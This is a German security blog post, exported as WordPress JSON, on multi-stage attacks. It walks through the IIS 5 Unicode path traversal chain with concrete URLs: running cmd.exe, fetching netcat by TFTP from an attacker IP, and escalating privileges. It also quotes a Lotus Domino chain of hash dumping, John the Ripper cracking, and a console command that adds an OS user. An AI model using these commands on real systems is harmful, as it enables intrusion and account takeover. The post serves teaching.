{"id":1286,"date":"2010-06-04T21:23:52","date_gmt":"2010-06-04T20:23:52","guid":{"rendered":"http:\/\/www.mitternachtshacking.de\/blog\/1286-mehrstufige-angriffe-fur-lotus-domino"},"modified":"2025-04-05T23:32:08","modified_gmt":"2025-04-05T21:32:08","slug":"mehrstufige-angriffe-fur-lotus-domino","status":"publish","type":"post","link":"https:\/\/www.mitternachtshacking.de\/blog\/1286-mehrstufige-angriffe-fur-lotus-domino","title":{"rendered":"Mehrstufige Angriffe f\u00fcr Lotus Domino"},"content":{"rendered":"<p>Mehrstufige Angriffe sind nach meiner Definition Angriffe, die mit einer scheinbar kleinen L\u00fccke beginnen, die dann aber \u00fcber mehrere Einzelschritte zu einer v\u00f6lligen Kompromittierung eines Systems f\u00fchren. In meinen Hacking-Seminaren verwende ich gerne ein Beispiel, das zwar steinalt ist, die Systematik eines Angriffs aber sehr sch\u00f6n vorf\u00fchrt: den IIS 5 Unicode Path Traversal Angriff.<\/p>\n<p>Auf den ersten Blick sieht der Unicode Path Traversal harmlos aus. Man kann damit auf Dateien au\u00dferhalb des eigentlich freigegebenen Verzeichnisses zugreifen. Das sieht aus wie eine relativ harmlose Verletzung der Vertraulichkeit auf einem \u00f6ffentlichen Webserver. Die Folgeschritte sehen dann so aus:<\/p>\n<ol>\n<li>Unicode Path Traversal erlaubt es auf Dateien au\u00dferhalb des Inetpub zuzugreifen.<\/li>\n<li>Das Scripts-Verzeichnis (und Unterverzeichnisse) enth\u00e4lt Dateien, die ausgef\u00fchrt werden d\u00fcrfen.<\/li>\n<li>Mit Hilfe des Scripts-Verzeichnisses und dem Path Traversal kann man die cmd.exe starten, wenn sich Inetpub und WINNT auf dem gleichen Laufwerk befinden. Die URL die ich verwende ist &#8222;http:\/\/[Server-IP]\/scripts\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir&#8220;.<\/li>\n<li>Bequemerweise kopiert man sich die cmd.exe direkt in das Scripts-Verzeichnis.<\/li>\n<li>\u00dcber die cmd.exe kann man TFTP starten und beispielsweise Netcat herunterladen. Die URL die ich verwende ist &#8222;http:\/\/[Server-IP]\/scripts\/cmd.exe?\/c+tftp+-i+[Angreifer-IP]+GET+nc.exe&#8220;.<\/li>\n<li>Netcat kann man wiederum \u00fcber die cmd.exe als Server starten. Schon hat man einen interaktiven Zugang. Allerdings mit beschr\u00e4nkten Rechten.<\/li>\n<li>Mit dem IIS-Exploit der httpodbc.dll kann man LocalSystem-Rechte bekommen. Die httpodbc.dll l\u00e4dt man beispielsweise via TFTP in das Scripts-Verzeichnis.<\/li>\n<\/ol>\n<p>Im Ergebnis hat man dann den Rechner komplett \u00fcbernommen. Nat\u00fcrlich gibt es den Unicodeloader, der diverse Schritte automatisch durchf\u00fchrt aber ich halte es f\u00fcr eine nette \u00dcbung, das schrittweise durchzuf\u00fchren.<\/p>\n<p>F\u00fcr Lotus Notes gibt es jetzt eine \u00e4hnliche Anleitung: &#8222;<a href=\"http:\/\/dsecrg.com\/files\/pub\/pdf\/Penetration_from_application_down_to_OS_(Lotus_Domino).pdf\">Getting OS Access Using Lotus Domino Application Server<\/a>&#8220; (PDF) von DSecRG:<\/p>\n<ol>\n<li>Run raptor_dominohash script and collect all password hashes<br \/>\n.\/raptor_dominohash 192.168.0.202<\/li>\n<li>Save hashes in file using format described in the Stage 3.<\/li>\n<li>Run JohnTheRipper with hashes file generated at the previous step<br \/>\n.\/john HASH.txt &#8211;format=lotus5<\/li>\n<li>If you find administrator&#8217;s hash you can address to:<br \/>\nhttp:\/\/servername\/webadmin.nsf<\/li>\n<li>In Quick Console run command that adds a new user to OS<br \/>\nload cmd \/c net user dsecrG password \/all<\/li>\n<li>For testing if this command successfully executed we run net user command and save the results to the file.<br \/>\nload cmd \/c net user &gt; C:\\Lotus\\Domino\\data\\domino\\html\\download\\filesets\\netuser1.png<\/li>\n<li>To view the results we open the following link:<br \/>\nhttp:\/\/servername\/download\/filesets\/netuser1.png<\/li>\n<\/ol>\n<p>Ok, f\u00fcr diesen Angriff braucht man ein erfolgreich gecracktes Admin-Login aber man kann das Verfahren leicht anpassen wenn man einen geeigneten Exploit f\u00fcr Lotus Domino hat. Mal sehen, vielleicht nehme ich das weiteres Beispiel f\u00fcr mehrstufige Angriffe in meinen Hacking-Workshop mit auf.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mehrstufige Angriffe sind nach meiner Definition Angriffe, die mit einer scheinbar kleinen L\u00fccke beginnen, die dann aber \u00fcber mehrere Einzelschritte zu einer v\u00f6lligen Kompromittierung eines Systems f\u00fchren. In meinen Hacking-Seminaren verwende ich gerne ein Beispiel, das zwar steinalt ist, die Systematik eines Angriffs aber sehr sch\u00f6n vorf\u00fchrt: den IIS 5 Unicode Path Traversal Angriff. Auf [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[8],"tags":[],"_links":{"self":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts\/1286"}],"collection":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/comments?post=1286"}],"version-history":[{"count":0,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts\/1286\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/media?parent=1286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/categories?post=1286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/tags?post=1286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}